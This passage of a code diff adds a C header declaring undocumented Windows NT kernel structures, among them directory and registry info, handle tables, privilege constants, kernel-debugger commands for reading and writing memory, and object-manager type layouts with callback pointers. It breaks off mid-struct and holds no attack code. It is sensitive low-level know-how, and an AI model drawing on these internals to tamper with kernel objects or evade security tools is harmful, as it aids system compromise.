+	LARGE_INTEGER CreationTime;
+	LARGE_INTEGER LastAccessTime;
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	LARGE_INTEGER EndOfFile;
+	LARGE_INTEGER AllocationSize;
+	ULONG FileAttributes;
+	ULONG FileNameLength;
+	ULONG EaSize;
+	WCHAR FileName[1];
+} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;
+
+typedef struct _FILE_ID_FULL_DIR_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG FileIndex;
+	LARGE_INTEGER CreationTime;
+	LARGE_INTEGER LastAccessTime;
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	LARGE_INTEGER EndOfFile;
+	LARGE_INTEGER AllocationSize;
+	ULONG FileAttributes;
+	ULONG FileNameLength;
+	ULONG EaSize;
+	LARGE_INTEGER FileId;
+	WCHAR FileName[1];
+} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;
+
+typedef struct _FILE_BOTH_DIR_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG FileIndex;
+	LARGE_INTEGER CreationTime;
+	LARGE_INTEGER LastAccessTime;
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	LARGE_INTEGER EndOfFile;
+	LARGE_INTEGER AllocationSize;
+	ULONG FileAttributes;
+	ULONG FileNameLength;
+	ULONG EaSize;
+	CCHAR ShortNameLength;
+	WCHAR ShortName[12];
+	WCHAR FileName[1];
+} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;
+
+typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG FileIndex;
+	LARGE_INTEGER CreationTime;
+	LARGE_INTEGER LastAccessTime;
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	LARGE_INTEGER EndOfFile;
+	LARGE_INTEGER AllocationSize;
+	ULONG FileAttributes;
+	ULONG FileNameLength;
+	ULONG EaSize;
+	CCHAR ShortNameLength;
+	WCHAR ShortName[12];
+	LARGE_INTEGER FileId;
+	WCHAR FileName[1];
+} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;
+
+typedef struct _FILE_NAMES_INFORMATION {
+	ULONG NextEntryOffset;
+	ULONG FileIndex;
+	ULONG FileNameLength;
+	WCHAR FileName[1];
+} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;
+
+typedef struct _FILE_OBJECTID_INFORMATION {
+	LONGLONG FileReference;
+	UCHAR ObjectId[16];
+	union {
+		struct {
+			UCHAR BirthVolumeId[16];
+			UCHAR BirthObjectId[16];
+			UCHAR DomainId[16];
+		};
+		UCHAR ExtendedInfo[48];
+	};
+} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;
+/*
+** File END
+*/
+
+/*
+** Section START
+*/
+
+#ifndef _SECTION_INFORMATION_CLASS
+typedef enum _SECTION_INFORMATION_CLASS {
+	SectionBasicInformation,
+	SectionImageInformation,
+	SectionRelocationInformation,
+	MaxSectionInfoClass
+} SECTION_INFORMATION_CLASS;
+#endif
+
+typedef struct _SECTIONBASICINFO {
+	PVOID BaseAddress;
+	ULONG AllocationAttributes;
+	LARGE_INTEGER MaximumSize;
+} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
+
+typedef struct _SECTION_IMAGE_INFORMATION {
+	PVOID TransferAddress;
+	ULONG ZeroBits;
+	SIZE_T MaximumStackSize;
+	SIZE_T CommittedStackSize;
+	ULONG SubSystemType;
+	union {
+		struct {
+			USHORT SubSystemMinorVersion;
+			USHORT SubSystemMajorVersion;
+		};
+		ULONG SubSystemVersion;
+	};
+	ULONG GpValue;
+	USHORT ImageCharacteristics;
+	USHORT DllCharacteristics;
+	USHORT Machine;
+	BOOLEAN ImageContainsCode;
+	BOOLEAN Spare1;
+	ULONG LoaderFlags;
+	ULONG ImageFileSize;
+	ULONG Reserved[1];
+} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;
+
+typedef struct _SECTION_IMAGE_INFORMATION64 {
+	ULONGLONG TransferAddress;
+	ULONG ZeroBits;
+	ULONGLONG MaximumStackSize;
+	ULONGLONG CommittedStackSize;
+	ULONG SubSystemType;
+	union {
+		struct {
+			USHORT SubSystemMinorVersion;
+			USHORT SubSystemMajorVersion;
+		};
+		ULONG SubSystemVersion;
+	};
+	ULONG GpValue;
+	USHORT ImageCharacteristics;
+	USHORT DllCharacteristics;
+	USHORT Machine;
+	BOOLEAN ImageContainsCode;
+	BOOLEAN Spare1;
+	ULONG LoaderFlags;
+	ULONG ImageFileSize;
+	ULONG Reserved[1];
+} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64;
+
+typedef enum _SECTION_INHERIT {
+	ViewShare = 1,
+	ViewUnmap = 2
+} SECTION_INHERIT;
+
+#define SEC_BASED          0x200000
+#define SEC_NO_CHANGE      0x400000
+#define SEC_FILE           0x800000     
+#define SEC_IMAGE         0x1000000     
+#define SEC_RESERVE       0x4000000     
+#define SEC_COMMIT        0x8000000     
+#define SEC_NOCACHE      0x10000000     
+#define SEC_GLOBAL       0x20000000
+#define SEC_LARGE_PAGES  0x80000000    
+
+/*
+** Section END
+*/
+
+/*
+** Kernel Debugger START
+*/
+
+#ifndef _SYSDBG_COMMAND
+typedef enum _SYSDBG_COMMAND {
+	SysDbgQueryModuleInformation,
+	SysDbgQueryTraceInformation,
+	SysDbgSetTracepoint,
+	SysDbgSetSpecialCall,
+	SysDbgClearSpecialCalls,
+	SysDbgQuerySpecialCalls,
+	SysDbgBreakPoint,
+	SysDbgQueryVersion,
+	SysDbgReadVirtual,
+	SysDbgWriteVirtual,
+	SysDbgReadPhysical,
+	SysDbgWritePhysical,
+	SysDbgReadControlSpace,
+	SysDbgWriteControlSpace,
+	SysDbgReadIoSpace,
+	SysDbgWriteIoSpace,
+	SysDbgReadMsr,
+	SysDbgWriteMsr,
+	SysDbgReadBusData,
+	SysDbgWriteBusData,
+	SysDbgCheckLowMemory,
+	SysDbgEnableKernelDebugger,
+	SysDbgDisableKernelDebugger,
+	SysDbgGetAutoKdEnable,
+	SysDbgSetAutoKdEnable,
+	SysDbgGetPrintBufferSize,
+	SysDbgSetPrintBufferSize,
+	SysDbgGetKdUmExceptionEnable,
+	SysDbgSetKdUmExceptionEnable,
+	SysDbgGetTriageDump,
+	SysDbgGetKdBlockEnable,
+	SysDbgSetKdBlockEnable,
+	SysDbgRegisterForUmBreakInfo,
+	SysDbgGetUmBreakPid,
+	SysDbgClearUmBreakPid,
+	SysDbgGetUmAttachPid,
+	SysDbgClearUmAttachPid
+} SYSDBG_COMMAND, *PSYSDBG_COMMAND;
+#endif
+
+#ifndef _SYSDBG_VIRTUAL
+typedef struct _SYSDBG_VIRTUAL
+{
+	PVOID Address;
+	PVOID Buffer;
+	ULONG Request;
+} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
+#endif
+
+/*
+** Kernel Debugger END
+*/
+
+/*
+** System Boot Environment START
+*/
+
+typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 // Size=20
+{
+	struct _GUID BootIdentifier;
+	enum _FIRMWARE_TYPE FirmwareType;
+} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1;
+
+typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION // Size=32
+{
+	struct _GUID BootIdentifier;
+	enum _FIRMWARE_TYPE FirmwareType;
+	unsigned __int64 BootFlags;
+} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION;
+
+/*
+** System Boot Environment END
+*/
+
+/*
+** Mutant START
+*/
+
+#ifndef _MUTANT_INFORMATION_CLASS
+typedef enum _MUTANT_INFORMATION_CLASS {
+	MutantBasicInformation
+} MUTANT_INFORMATION_CLASS;
+#endif
+
+#ifndef _MUTANT_BASIC_INFORMATION
+typedef struct _MUTANT_BASIC_INFORMATION {
+	LONG CurrentCount;
+	BOOLEAN OwnedByCaller;
+	BOOLEAN AbandonedState;
+} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;
+#endif
+
+/*
+** Mutant END
+*/
+
+/*
+** Key START
+*/
+
+#ifndef _KEY_INFORMATION_CLASS 
+typedef enum _KEY_INFORMATION_CLASS {
+	KeyBasicInformation,
+	KeyNodeInformation,
+	KeyFullInformation,
+	KeyNameInformation,
+	KeyCachedInformation,
+	KeyFlagsInformation,
+	MaxKeyInfoClass
+} KEY_INFORMATION_CLASS;
+#endif
+
+#ifndef _KEY_FULL_INFORMATION
+typedef struct _KEY_FULL_INFORMATION {
+	LARGE_INTEGER LastWriteTime;
+	ULONG   TitleIndex;
+	ULONG   ClassOffset;
+	ULONG   ClassLength;
+	ULONG   SubKeys;
+	ULONG   MaxNameLen;
+	ULONG   MaxClassLen;
+	ULONG   Values;
+	ULONG   MaxValueNameLen;
+	ULONG   MaxValueDataLen;
+	WCHAR   Class[1];
+} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;
+#endif
+
+#ifndef _KEY_BASIC_INFORMATION
+typedef struct _KEY_BASIC_INFORMATION {
+	LARGE_INTEGER LastWriteTime;
+	ULONG TitleIndex;
+	ULONG NameLength;
+	WCHAR Name[1];
+} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;
+#endif
+
+#ifndef _KEY_VALUE_INFORMATION_CLASS
+typedef enum _KEY_VALUE_INFORMATION_CLASS {
+	KeyValueBasicInformation,
+	KeyValueFullInformation,
+	KeyValuePartialInformation,
+	KeyValueFullInformationAlign64,
+	KeyValuePartialInformationAlign64,
+	MaxKeyValueInfoClass
+} KEY_VALUE_INFORMATION_CLASS;
+#endif
+
+#ifndef _KEY_VALUE_BASIC_INFORMATION
+typedef struct _KEY_VALUE_BASIC_INFORMATION {
+	ULONG   TitleIndex;
+	ULONG   Type;
+	ULONG   NameLength;
+	WCHAR   Name[1];            // Variable size
+} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;
+#endif
+
+#ifndef _KEY_VALUE_FULL_INFORMATION
+typedef struct _KEY_VALUE_FULL_INFORMATION {
+	ULONG   TitleIndex;
+	ULONG   Type;
+	ULONG   DataOffset;
+	ULONG   DataLength;
+	ULONG   NameLength;
+	WCHAR   Name[1];            // Variable size
+	//          Data[1];            // Variable size data not declared
+} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;
+#endif
+
+#ifndef _KEY_VALUE_PARTIAL_INFORMATION
+typedef struct _KEY_VALUE_PARTIAL_INFORMATION {
+	ULONG   TitleIndex;
+	ULONG   Type;
+	ULONG   DataLength;
+	UCHAR   Data[1];            // Variable size
+} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;
+#endif
+
+#ifndef _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64
+typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 {
+	ULONG   Type;
+	ULONG   DataLength;
+	UCHAR   Data[1];            // Variable size
+} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64;
+#endif
+
+#ifndef _KEY_VALUE_ENTRY
+typedef struct _KEY_VALUE_ENTRY {
+	PUNICODE_STRING ValueName;
+	ULONG           DataLength;
+	ULONG           DataOffset;
+	ULONG           Type;
+} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY;
+#endif
+
+/*
+** Key END
+*/
+
+/*
+** IoCompletion START
+*/
+
+#ifndef _IO_COMPLETION_INFORMATION_CLASS
+typedef enum _IO_COMPLETION_INFORMATION_CLASS {
+	IoCompletionBasicInformation
+} IO_COMPLETION_INFORMATION_CLASS;
+#endif
+
+#ifndef _IO_COMPLETION_BASIC_INFORMATION
+typedef struct _IO_COMPLETION_BASIC_INFORMATION {
+	LONG Depth;
+} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION;
+#endif
+
+/*
+** IoCompletion END
+*/
+
+/*
+** Event START
+*/
+
+//
+// Event Specific Access Rights.
+//
+
+typedef enum _EVENT_INFORMATION_CLASS {
+	EventBasicInformation
+} EVENT_INFORMATION_CLASS;
+
+typedef enum _EVENT_TYPE {
+	NotificationEvent,
+	SynchronizationEvent
+} EVENT_TYPE;
+
+typedef struct _EVENT_BASIC_INFORMATION {
+	EVENT_TYPE EventType;
+	LONG EventState;
+} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;
+
+/*
+** Event END
+*/
+
+/*
+** TIME_FIELDS START
+*/
+
+#ifndef CSHORT
+typedef short CSHORT;
+#endif
+typedef struct _TIME_FIELDS {
+	CSHORT Year;        // range [1601...]
+	CSHORT Month;       // range [1..12]
+	CSHORT Day;         // range [1..31]
+	CSHORT Hour;        // range [0..23]
+	CSHORT Minute;      // range [0..59]
+	CSHORT Second;      // range [0..59]
+	CSHORT Milliseconds;// range [0..999]
+	CSHORT Weekday;     // range [0..6] == [Sunday..Saturday]
+} TIME_FIELDS;
+typedef TIME_FIELDS *PTIME_FIELDS;
+
+/*
+** TIME_FIELDS END
+*/
+
+/*
+** HANDLE START
+*/
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
+	USHORT UniqueProcessId;
+	USHORT CreatorBackTraceIndex;
+	UCHAR ObjectTypeIndex;
+	UCHAR HandleAttributes;
+	USHORT HandleValue;
+	PVOID Object;
+	ULONG GrantedAccess;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION {
+	ULONG NumberOfHandles;
+	SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+/*
+** HANDLE END
+*/
+
+// Privileges
+
+#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L)
+#define SE_CREATE_TOKEN_PRIVILEGE (2L)
+#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L)
+#define SE_LOCK_MEMORY_PRIVILEGE (4L)
+#define SE_INCREASE_QUOTA_PRIVILEGE (5L)
+#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L)
+#define SE_TCB_PRIVILEGE (7L)
+#define SE_SECURITY_PRIVILEGE (8L)
+#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L)
+#define SE_LOAD_DRIVER_PRIVILEGE (10L)
+#define SE_SYSTEM_PROFILE_PRIVILEGE (11L)
+#define SE_SYSTEMTIME_PRIVILEGE (12L)
+#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L)
+#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L)
+#define SE_CREATE_PAGEFILE_PRIVILEGE (15L)
+#define SE_CREATE_PERMANENT_PRIVILEGE (16L)
+#define SE_BACKUP_PRIVILEGE (17L)
+#define SE_RESTORE_PRIVILEGE (18L)
+#define SE_SHUTDOWN_PRIVILEGE (19L)
+#define SE_DEBUG_PRIVILEGE (20L)
+#define SE_AUDIT_PRIVILEGE (21L)
+#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L)
+#define SE_CHANGE_NOTIFY_PRIVILEGE (23L)
+#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L)
+#define SE_UNDOCK_PRIVILEGE (25L)
+#define SE_SYNC_AGENT_PRIVILEGE (26L)
+#define SE_ENABLE_DELEGATION_PRIVILEGE (27L)
+#define SE_MANAGE_VOLUME_PRIVILEGE (28L)
+#define SE_IMPERSONATE_PRIVILEGE (29L)
+#define SE_CREATE_GLOBAL_PRIVILEGE (30L)
+#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L)
+#define SE_RELABEL_PRIVILEGE (32L)
+#define SE_INC_WORKING_SET_PRIVILEGE (33L)
+#define SE_TIME_ZONE_PRIVILEGE (34L)
+#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)
+#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
+#endif
+
+/*
+** OBJECT MANAGER START
+*/
+
+//
+// Header flags
+//
+
+#define OB_FLAG_NEW_OBJECT              0x01
+#define OB_FLAG_KERNEL_OBJECT           0x02
+#define OB_FLAG_CREATOR_INFO            0x04
+#define OB_FLAG_EXCLUSIVE_OBJECT        0x08
+#define OB_FLAG_PERMANENT_OBJECT        0x10
+#define OB_FLAG_DEFAULT_SECURITY_QUOTA  0x20
+#define OB_FLAG_SINGLE_HANDLE_ENTRY     0x40
+#define OB_FLAG_DELETED_INLINE          0x80
+
+//
+// InfoMask values
+//
+
+#define OB_INFOMASK_PROCESS_INFO	0x10
+#define OB_INFOMASK_QUOTA			0x08
+#define OB_INFOMASK_HANDLE			0x04
+#define OB_INFOMASK_NAME			0x02
+#define OB_INFOMASK_CREATOR_INFO	0x01
+
+typedef PVOID *PDEVICE_MAP;
+
+typedef struct _OBJECT_DIRECTORY_ENTRY {
+	PVOID ChainLink;
+	PVOID Object;
+	ULONG HashValue;
+} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;
+
+typedef struct _EX_PUSH_LOCK {
+	union
+	{
+		ULONG Locked : 1;
+		ULONG Waiting : 1;
+		ULONG Waking : 1;
+		ULONG MultipleShared : 1;
+		ULONG Shared : 28;
+		ULONG Value;
+		PVOID Ptr;
+	};
+} EX_PUSH_LOCK, *PEX_PUSH_LOCK;
+
+typedef struct _OBJECT_DIRECTORY {
+	POBJECT_DIRECTORY_ENTRY HashBuckets[37];
+	EX_PUSH_LOCK Lock;
+	PDEVICE_MAP DeviceMap;
+	ULONG SessionId;
+	PVOID NamespaceEntry;
+	ULONG Flags;
+} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
+
+typedef struct _OBJECT_HEADER_NAME_INFO {
+	POBJECT_DIRECTORY Directory;
+	UNICODE_STRING Name;
+	ULONG QueryReferences;
+} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;
+
+typedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32
+	LIST_ENTRY TypeList; // Size=16 Offset=0
+	PVOID CreatorUniqueProcess; // Size=8 Offset=16
+	USHORT CreatorBackTraceIndex; // Size=2 Offset=24
+	USHORT Reserved; // Size=2 Offset=26
+} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO;
+
+typedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16
+	PVOID Process; // Size=8 Offset=0
+	struct
+	{
+		unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24
+		unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8
+	};
+} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY;
+
+typedef struct _OBJECT_HEADER_HANDLE_INFO // Size=16
+{
+	union
+	{
+		PVOID HandleCountDataBase; // Size=8 Offset=0
+		struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0
+	};
+} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO;
+
+typedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16
+	PVOID ExclusiveProcess; // Size=8 Offset=0
+	unsigned __int64 Reserved; // Size=8 Offset=8
+} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO;
+
+typedef struct _OBJECT_HEADER_QUOTA_INFO {
+	ULONG PagedPoolCharge; //4
+	ULONG NonPagedPoolCharge; //4 
+	ULONG SecurityDescriptorCharge; //4
+	PVOID SecurityDescriptorQuotaBlock; //sizeof(pointer)
+	unsigned __int64 Reserved; //sizeof(uint64)
+} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO;
+
+typedef struct _QUAD {
+	union
+	{
+		INT64 UseThisFieldToCopy;
+		float DoNotUseThisField;
+	};
+} QUAD, *PQUAD;
+
+typedef struct _OBJECT_CREATE_INFORMATION {
+	ULONG Attributes;
+	PVOID RootDirectory;
+	CHAR ProbeMode;
+	ULONG PagedPoolCharge;
+	ULONG NonPagedPoolCharge;
+	ULONG SecurityDescriptorCharge;
+	PVOID SecurityDescriptor;
+	PSECURITY_QUALITY_OF_SERVICE SecurityQos;
+	SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
+} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;
+
+typedef enum _POOL_TYPE {
+	NonPagedPool = 0,
+	NonPagedPoolExecute = 0,
+	PagedPool = 1,
+	NonPagedPoolMustSucceed = 2,
+	DontUseThisType = 3,
+	NonPagedPoolCacheAligned = 4,
+	PagedPoolCacheAligned = 5,
+	NonPagedPoolCacheAlignedMustS = 6,
+	MaxPoolType = 7,
+	NonPagedPoolBase = 0,
+	NonPagedPoolBaseMustSucceed = 2,
+	NonPagedPoolBaseCacheAligned = 4,
+	NonPagedPoolBaseCacheAlignedMustS = 6,
+	NonPagedPoolSession = 32,
+	PagedPoolSession = 33,
+	NonPagedPoolMustSucceedSession = 34,
+	DontUseThisTypeSession = 35,
+	NonPagedPoolCacheAlignedSession = 36,
+	PagedPoolCacheAlignedSession = 37,
+	NonPagedPoolCacheAlignedMustSSession = 38,
+	NonPagedPoolNx = 512,
+	NonPagedPoolNxCacheAligned = 516,
+	NonPagedPoolSessionNx = 544
+} POOL_TYPE;
+
+typedef struct _OBJECT_TYPE_INITIALIZER_V1 {
+	USHORT          Length;
+	BOOLEAN         UseDefaultObject;
+	BOOLEAN         Reserved1;
+	ULONG           InvalidAttributes;
+	GENERIC_MAPPING GenericMapping;
+	ACCESS_MASK     ValidAccessMask;
+	BOOLEAN         SecurityRequired;
+	BOOLEAN         MaintainHandleCount;
+	BOOLEAN         MaintainTypeList;
+	UCHAR           Reserved2;
+	BOOLEAN         PagedPool;
+	ULONG           DefaultPagedPoolCharge;
+	ULONG           DefaultNonPagedPoolCharge;
+	PVOID           DumpProcedure;
+	PVOID           OpenProcedure;
+	PVOID           CloseProcedure;
+	PVOID           DeleteProcedure;
+	PVOID           ParseProcedure;
+	PVOID           SecurityProcedure;
+	PVOID           QueryNameProcedure;
+	PVOID           OkayToCloseProcedure;
+} OBJECT_TYPE_INITIALIZER_V1, *POBJECT_TYPE_INITIALIZER_V1;
+
+typedef struct _OBJECT_TYPE_INITIALIZER_V2 {// Size=120
+	USHORT Length; // Size=2 Offset=0
+	UCHAR ObjectTypeFlags; // Size=1 Offset=2
+	ULONG ObjectTypeCode; // Size=4 Offset=4
+	ULONG InvalidAttributes; // Size=4 Offset=8
+	GENERIC_MAPPING GenericMapping; // Size=16 Offset=12
+	ULONG ValidAccessMask; // Size=4 Offset=28
+	ULONG RetainAccess; // Size=4 Offset=32
+	POOL_TYPE PoolType; // Size=4 Offset=36
+	ULONG DefaultPagedPoolCharge; // Size=4 Offset=40
+	ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44
+	PVOID DumpProcedure; // Size=8 Offset=48
+	PVOID OpenProcedure; // Size=8 Offset=56
+	PVOID CloseProcedure; // Size=8 Offset=64
+	PVOID DeleteProcedure; // Size=8 Offset=72
+	PVOID ParseProcedure; // Size=8 Offset=80
+	PVOID SecurityProcedure; // Size=8 Offset=88
+	PVOID QueryNameProcedure; // Size=8 Offset=96
+	PVOID OkayToCloseProcedure; // Size=8 Offset=104
+} OBJECT_TYPE_INITIALIZER_V2, *POBJECT_TYPE_INITIALIZER_V2;
+
+typedef struct _OBJECT_TYPE_INITIALIZER_V3 {// Size=120
+	USHORT Length; // Size=2 Offset=0
+	UCHAR ObjectTypeFlags; // Size=1 Offset=2
+	ULONG ObjectTypeCode; // Size=4 Offset=4
+	ULONG InvalidAttributes; // Size=4 Offset=8
+	GENERIC_MAPPING GenericMapping; // Size=16 Offset=12
+	ULONG ValidAccessMask; // Size=4 Offset=28
+	ULONG RetainAccess; // Size=4 Offset=32
+	POOL_TYPE PoolType; // Size=4 Offset=36
+	ULONG DefaultPagedPoolCharge; // Size=4 Offset=40
+	ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44
+	PVOID DumpProcedure; // Size=8 Offset=48
+	PVOID OpenProcedure; // Size=8 Offset=56
+	PVOID CloseProcedure; // Size=8 Offset=64
+	PVOID DeleteProcedure; // Size=8 Offset=72
+	PVOID ParseProcedure; // Size=8 Offset=80
+	PVOID SecurityProcedure; // Size=8 Offset=88
+	PVOID QueryNameProcedure; // Size=8 Offset=96
+	PVOID OkayToCloseProcedure; // Size=8 Offset=104
+	ULONG WaitObjectFlagMask; // Size=4 Offset=112
+	USHORT WaitObjectFlagOffset; // Size=2 Offset=116
+	USHORT WaitObjectPointerOffset; // Size=2 Offset=118
+} OBJECT_TYPE_INITIALIZER_V3, *POBJECT_TYPE_INITIALIZER_V3;
+
+typedef struct _OBJECT_TYPE_INITIALIZER {// Size=120
+	USHORT Length; // Size=2 Offset=0
+	UCHAR ObjectTypeFlags; // Size=1 Offset=2
+	ULONG ObjectTypeCode; // Size=4 Offset=4
+	ULONG InvalidAttributes; // Size=4 Offset=8
+	GENERIC_MAPPING GenericMapping; // Size=16 Offset=12
+	ULONG ValidAccessMask; // Size=4 Offset=28
+	ULONG RetainAccess; // Size=4 Offset=32
+	POOL_TYPE PoolType; // Size=4 Offset=36
+	ULONG DefaultPagedPoolCharge; // Size=4 Offset=40
+	ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44
+	PVOID DumpProcedure; // Size=8 Offset=48
+	PVOID OpenProcedure; // Size=8 Offset=56
+	PVOID CloseProcedure; // Size=8 Offset=64
+	PVOID DeleteProcedure; // Size=8 Offset=72
+	PVOID ParseProcedure; // Size=8 Offset=80
+	PVOID SecurityProcedure; // Size=8 Offset=88
+	PVOID QueryNameProcedure; // Size=8 Offset=96
+	PVOID OkayToCloseProcedure; // Size=8 Offset=104
+} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;
+
+typedef struct _OBJECT_TYPE_V2 {// Size=216
+	LIST_ENTRY TypeList; // Size=16 Offset=0
+	UNICODE_STRING Name; // Size=16 Offset=16
+	PVOID DefaultObject; // Size=8 Offset=32
+	UCHAR Index; // Size=1 Offset=40
+	ULONG TotalNumberOfObjects; // Size=4 Offset=44
+	ULONG TotalNumberOfHandles; // Size=4 Offset=48
+	ULONG HighWaterNumberOfObjects; // Size=4 Offset=52
+	ULONG HighWaterNumberOfHandles; // Size=4 Offset=56
+	OBJECT_TYPE_INITIALIZER_V2 TypeInfo;
+	EX_PUSH_LOCK TypeLock;
+	ULONG Key;
+	LIST_ENTRY CallbackList;
+} OBJECT_TYPE_V2, *POBJECT_TYPE_V2;
+
+typedef struct _OBJECT_TYPE_V3 {// Size=216
+	LIST_ENTRY TypeList; // Size=16 Offset=0
+	UNICODE_STRING Name; // Size=16 Offset=16
+	PVOID DefaultObject; // Size=8 Offset=32
+	UCHAR Index; // Size=1 Offset=40
+	ULONG TotalNumberOfObjects; // Size=4 Offset=44
+	ULONG TotalNumberOfHandles; // Size=4 Offset=48
+	ULONG HighWaterNumberOfObjects; // Size=4 Offset=52
+	ULONG HighWaterNumberOfHandles; // Size=4 Offset=56
+	OBJECT_TYPE_INITIALIZER_V3 TypeInfo;
+	EX_PUSH_LOCK TypeLock;
+	ULONG Key;
+	LIST_ENTRY CallbackList;
+} OBJECT_TYPE_V3, *POBJECT_TYPE_V3;
+
+typedef struct _OBJECT_TYPE_COMPATIBLE {
+	LIST_ENTRY TypeList;
+	UNICODE_STRING Name;
+	PVOID DefaultObject;
+	UCHAR Index;
+	ULONG TotalNumberOfObjects;
+	ULONG TotalNumberOfHandles;
+	ULONG HighWaterNumberOfObjects;
+	ULONG HighWaterNumberOfHandles;
+	OBJECT_TYPE_INITIALIZER_V2 TypeInfo;
+} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE;
+
+/*
+** brand new header starting from 6.1
+*/
+
+typedef struct _OBJECT_HEADER {
+	LONG PointerCount;
+	union
+	{
+		LONG HandleCount;
+		PVOID NextToFree;
+	};
+	EX_PUSH_LOCK Lock;
+	UCHAR TypeIndex;
+	UCHAR TraceFlags;
+	UCHAR InfoMask;
+	UCHAR Flags;
+	union
+	{
+		POBJECT_CREATE_INFORMATION ObjectCreateInfo;
+		PVOID QuotaBlockCharged;
+	};
+	PVOID SecurityDescriptor;
+	QUAD Body;
+} OBJECT_HEADER, *POBJECT_HEADER;
+
+#define OBJECT_TO_OBJECT_HEADER(obj) \
+    CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )
+
+/*
+** OBJECT MANAGER END
+*/
+
+/*
+* WDM START
+*/
+#define TIMER_TOLERABLE_DELAY_BITS      6
+#define TIMER_EXPIRED_INDEX_BITS        6
+#define TIMER_PROCESSOR_INDEX_BITS      5
+
+typedef struct _DISPATCHER_HEADER {
+	union {
+		union {
+			volatile LONG Lock;
+			LONG LockNV;
+		} DUMMYUNIONNAME;
+
+		struct {                            // Events, Semaphores, Gates, etc.
+			UCHAR Type;                     // All (accessible via KOBJECT_TYPE)
+			UCHAR Signalling;
+			UCHAR Size;
+			UCHAR Reserved1;
+		} DUMMYSTRUCTNAME;
+
+		struct {                            // Timer
